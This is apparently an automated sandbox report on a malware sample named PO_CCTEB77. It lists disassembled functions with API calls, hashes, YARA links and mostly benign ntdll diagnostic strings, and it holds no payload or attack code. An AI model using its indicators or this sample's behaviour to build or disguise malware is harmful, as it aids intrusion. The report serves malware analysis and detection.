                                                                            Uniqueness Score: -1.00%

                                                                            Function 00413BF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 86 413bf3-413c05 87 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 86->87 88 413c08 call 42a323 86->88 97 413c7d-413c83 87->97 98 413c5f-413c6e PostThreadMessageW 87->98 88->87 98->97 99 413c70-413c7a 98->99 99->97
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                            • Instruction ID: 2b11c294a3421bd6dee33fc7c99cb899cc9a872ef9e39964c471318ebb4cf5bc
                                                                            • Opcode Fuzzy Hash: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                            • Instruction Fuzzy Hash: E101C4B2D0015C7ADB00AAE19C81DEF7B7CDF41698F408069FE14B7240E57C4F068BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00428763 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(004122B5,?,004122B5,?,00000000,004122B5,?,004122B5,?,?), ref: 004287A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction ID: 2c1a71614233d00c30b3bb4d428e9b765d3603c09bbdcb5fe6948e3b9beed476
                                                                            • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction Fuzzy Hash: B4E092B22043487BD610EE99EC81FDB37ACEFC5710F404419F908A7241C670BD108BB8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00428713 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00419A10,?,?,00419A10,?,?,?,00419A10,?,00002000), ref: 0042874F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction ID: 6bdbf4cad4e37bd7c73d14c5b69e3c11c0b4df46002673f412cfc2a151788784
                                                                            • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction Fuzzy Hash: 88E06DB1204204BBD610EE59EC42EAB77ACEFC5710F40401AF908A7241C670BD108BB8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004287B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,00000000,?,?,4CF2BAE6,?,?,4CF2BAE6), ref: 004287E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                            • Instruction ID: a70d2caf07bf9b91732c47b13bc5c2eba1b16618381eb4ebddd6603121694906
                                                                            • Opcode Fuzzy Hash: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                            • Instruction Fuzzy Hash: 0AE04F712442547BD220AA6AEC41FD7776CDBC5754F40411AFA18A7282C6707A058BE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
                                                                            • Instruction ID: 450d17dcebef1bfb723e773a3134e069cc8c8590a95641f685744330311b5f63
                                                                            • Opcode Fuzzy Hash: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
                                                                            • Instruction Fuzzy Hash: 12B09B739415C5CEDA52E7644A0D717790577D2701F15C065D3034685F8778C2D5E276
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 01878D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • <unknown>, xrefs: 01878D2E, 01878D81, 01878E00, 01878E49, 01878EC7, 01878F3E
                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01878E86
                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01878F2D
                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01878DC4
                                                                            • The resource is owned shared by %d threads, xrefs: 01878E2E
                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01878D8C
                                                                            • *** enter .exr %p for the exception record, xrefs: 01878FA1
                                                                            • *** then kb to get the faulting stack, xrefs: 01878FCC
                                                                            • Go determine why that thread has not released the critical section., xrefs: 01878E75
                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01878E4B
                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01878F34
                                                                            • This failed because of error %Ix., xrefs: 01878EF6
                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01878DA3
                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01878DD3
                                                                            • *** Inpage error in %ws:%s, xrefs: 01878EC8
                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01878F3F
                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01878E3F
                                                                            • The instruction at %p referenced memory at %p., xrefs: 01878EE2
                                                                            • The critical section is owned by thread %p., xrefs: 01878E69
                                                                            • The resource is owned exclusively by thread %p, xrefs: 01878E24
                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01878FEF
                                                                            • read from, xrefs: 01878F5D, 01878F62
                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01878F26
                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01878E02
                                                                            • write to, xrefs: 01878F56
                                                                            • an invalid address, %p, xrefs: 01878F7F
                                                                            • *** enter .cxr %p for the context, xrefs: 01878FBD
                                                                            • a NULL pointer, xrefs: 01878F90
                                                                            • The instruction at %p tried to %s , xrefs: 01878F66
                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01878DB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                            • API String ID: 0-108210295
                                                                            • Opcode ID: 2b8b02ba3e56a106e39422c3566472aad92ee548d7113894c554a1911e238eb8
                                                                            • Instruction ID: 329dc281b561a5f2fa488a0e814fdbcb10e4b653c4b462970995a1808a21ba8d
                                                                            • Opcode Fuzzy Hash: 2b8b02ba3e56a106e39422c3566472aad92ee548d7113894c554a1911e238eb8
                                                                            • Instruction Fuzzy Hash: 7E81F4B5B40218BFDB269A1D8C99EAB7F35EF67B18F010048F209EF112E775C651C662
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01842349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2160512332
                                                                            • Opcode ID: 615bb80df6310a48fa5d6b65a486fdee19ee692b6289ee6e83ee0bca06b6723d
                                                                            • Instruction ID: 7a13e561b814aaffe141a62ca7f36e7d3149168f724ef5a11c8f655291733da4
                                                                            • Opcode Fuzzy Hash: 615bb80df6310a48fa5d6b65a486fdee19ee692b6289ee6e83ee0bca06b6723d
                                                                            • Instruction Fuzzy Hash: B092D07160834AAFE721DF18C884B6BBBEABF84714F04491DFA94D7251DB70EA44CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Thread identifier, xrefs: 0183553A
                                                                            • Critical section address, xrefs: 01835425, 018354BC, 01835534
                                                                            • Invalid debug info address of this critical section, xrefs: 018354B6
                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0183540A, 01835496, 01835519
                                                                            • Critical section address., xrefs: 01835502
                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354E2
                                                                            • undeleted critical section in freed memory, xrefs: 0183542B
                                                                            • corrupted critical section, xrefs: 018354C2
                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354CE
                                                                            • double initialized or corrupted critical section, xrefs: 01835508
                                                                            • Critical section debug info address, xrefs: 0183541F, 0183552E
                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01835543
                                                                            • Address of the debug info found in the active list., xrefs: 018354AE, 018354FA
                                                                            • 8, xrefs: 018352E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                            • API String ID: 0-2368682639
                                                                            • Opcode ID: b4d1fa02458abe525d5d44274fccf062e07835c885f2f52cde2f51ed49376394
                                                                            • Instruction ID: 222ae7f2eb1a7c27f5577d57c0038f65893e78e95b497fb6a3ddfc801aedf822
                                                                            • Opcode Fuzzy Hash: b4d1fa02458abe525d5d44274fccf062e07835c885f2f52cde2f51ed49376394
                                                                            • Instruction Fuzzy Hash: 95819DB0A40348EFDB20CF99C884BAEFBB5BB88B05F544119F504F7280D3B5AA44CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01832624
                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0183261F
                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01832409
                                                                            • @, xrefs: 0183259B
                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01832412
                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01832498
                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018324C0
                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018322E4
                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018325EB
                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01832506
                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01832602
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                            • API String ID: 0-4009184096
                                                                            • Opcode ID: cba7b98d93d2b81843606960ff0c05612e847c5102a362f1061c01c4db72218d
                                                                            • Instruction ID: 1d0c8b4310f8e322e5d70f9222d6655ca3a74257d2ffd306fceb0f9f72fd992f
                                                                            • Opcode Fuzzy Hash: cba7b98d93d2b81843606960ff0c05612e847c5102a362f1061c01c4db72218d
                                                                            • Instruction Fuzzy Hash: 090261F1D002299BDB21DB58CC80B9AF7B8AF54304F4441DAA749E7242EB719F84CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01868B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                            • API String ID: 0-2515994595
                                                                            • Opcode ID: 549c32f5bcf9a45a20741af671f120870612f8aa723317d8bc02116fafa156f4
                                                                            • Instruction ID: b094aad1eb833fd1eeaa54c64ae4628f64a4e66613043faa0b51948461b5f76d
                                                                            • Opcode Fuzzy Hash: 549c32f5bcf9a45a20741af671f120870612f8aa723317d8bc02116fafa156f4
                                                                            • Instruction Fuzzy Hash: 5051F3711143059BC729DF189844BABBBECFF9A354F14092DEA99C7284E770D708CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017DAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-3197712848
                                                                            • Opcode ID: d0550c683082d80b9a259e2b113d96ab40c982b81057fc23dbcbc825c0354397
                                                                            • Instruction ID: 97fa6a884be8eb5457147e5c231daa9835a9c0c30327651bdb56bdeb73708df0
                                                                            • Opcode Fuzzy Hash: d0550c683082d80b9a259e2b113d96ab40c982b81057fc23dbcbc825c0354397
                                                                            • Instruction Fuzzy Hash: B212F271A0835A8BD725DF28C480BAAF7F4FF85714F09099DF9858B291E734DA44CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01870274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 0-1700792311
                                                                            • Opcode ID: c36cce4e8eb34956008fe080121732ec9efdfa024b202d4e2b9fe619f16a5cd9
                                                                            • Instruction ID: fee6757f093ed68e444365767b89d52277c62626c355f63f1942d51426c7eb08
                                                                            • Opcode Fuzzy Hash: c36cce4e8eb34956008fe080121732ec9efdfa024b202d4e2b9fe619f16a5cd9
                                                                            • Instruction Fuzzy Hash: 60D1EE7150468ADFDB22DF68C495AA9FBF1FF4A704F088059F846DB252C734EA81CB14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017CADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                            • API String ID: 0-664215390
                                                                            • Opcode ID: d051ca3bf6913df26151d427b1e16d37ff174183a6e87cf45cc3b849cac7154a
                                                                            • Instruction ID: b904ed6dcd2cdafa8da0159190922dba7484c99a05386526cd5e87753d63368d
                                                                            • Opcode Fuzzy Hash: d051ca3bf6913df26151d427b1e16d37ff174183a6e87cf45cc3b849cac7154a
                                                                            • Instruction Fuzzy Hash: 9D328F719042698BDB22CB18C899BEEFBB5BF45B80F1441EEE849A7251D7359FC18F40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 018489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • HandleTraces, xrefs: 01848C8F
                                                                            • VerifierDlls, xrefs: 01848CBD
                                                                            • VerifierFlags, xrefs: 01848C50
                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01848A3D
                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01848A67
                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01848B8F
                                                                            • VerifierDebug, xrefs: 01848CA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                            • API String ID: 0-3223716464
                                                                            • Opcode ID: 62ba837ce6cace66851ccde789b4182881500c789792e48892a7e88db5233147
                                                                            • Instruction ID: e3e46ddb7b294f84a97097b82ff33ca517e31e475fd979b58dd3dfd6093697a3
                                                                            • Opcode Fuzzy Hash: 62ba837ce6cace66851ccde789b4182881500c789792e48892a7e88db5233147
                                                                            • Instruction Fuzzy Hash: 489128B1A4631A9FD722DFACC8C0B5BB7E4AB56718F440518FA45EB241DB709F00CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01844DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpGenericExceptionFilter, xrefs: 01844DFC
                                                                            • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01844DF5
                                                                            • LdrpProtectedCopyMemory, xrefs: 01844DF4
                                                                            • minkernel\ntdll\ldrutil.c, xrefs: 01844E06
                                                                            • Execute '.cxr %p' to dump context, xrefs: 01844EB1
                                                                            • ***Exception thrown within loader***, xrefs: 01844E27
                                                                            • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01844E38
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-2973941816
                                                                            • Opcode ID: d8245cd0e0eb200ebb05e6fecc989282b5c8c786cc667ba4477856e55c9952e5
                                                                            • Instruction ID: 3e6ee34d84c17af34c9827324383372500df43b8f09044e54d1581a0cbe980b9
                                                                            • Opcode Fuzzy Hash: d8245cd0e0eb200ebb05e6fecc989282b5c8c786cc667ba4477856e55c9952e5
                                                                            • Instruction Fuzzy Hash: 6C216BB214821D7BF7389A6C8C55F26BB58FBC1B74F540204F612EA580CE60DF01C626
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                            • API String ID: 0-1109411897
                                                                            • Opcode ID: 151a0de3fd0ed1bfeb811f4013819ba32924035ece74ecfc2f690dffb7d5abae
                                                                            • Instruction ID: 8a3df22419d5236c4589f1f0abceb048d915e35d971c48740847ed7c5a4bebde
                                                                            • Opcode Fuzzy Hash: 151a0de3fd0ed1bfeb811f4013819ba32924035ece74ecfc2f690dffb7d5abae
                                                                            • Instruction Fuzzy Hash: 3FA23974A0562A8FDB65CF18C888BA9FBB5AF49704F1442EED90DA7250DB309EC5CF10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-792281065
                                                                            • Opcode ID: 1fbc1c23d5f506248f74aa55e7f4a5caf2bb571d70fd7458b7fa6a5640a020ce
                                                                            • Instruction ID: 4fecb9d7629534c601409bfa96fc620e0a0526d397d7a8266087d9588c395bd2
                                                                            • Opcode Fuzzy Hash: 1fbc1c23d5f506248f74aa55e7f4a5caf2bb571d70fd7458b7fa6a5640a020ce
                                                                            • Instruction Fuzzy Hash: 70912870B017159BDB35EF58D899BAABBA1BB91B14F18022CEA00F7385D7749B01CBD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitShimEngine, xrefs: 018199F4, 01819A07, 01819A30
                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01819A2A
                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01819A01
                                                                            • apphelp.dll, xrefs: 017B6496
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01819A11, 01819A3A
                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018199ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
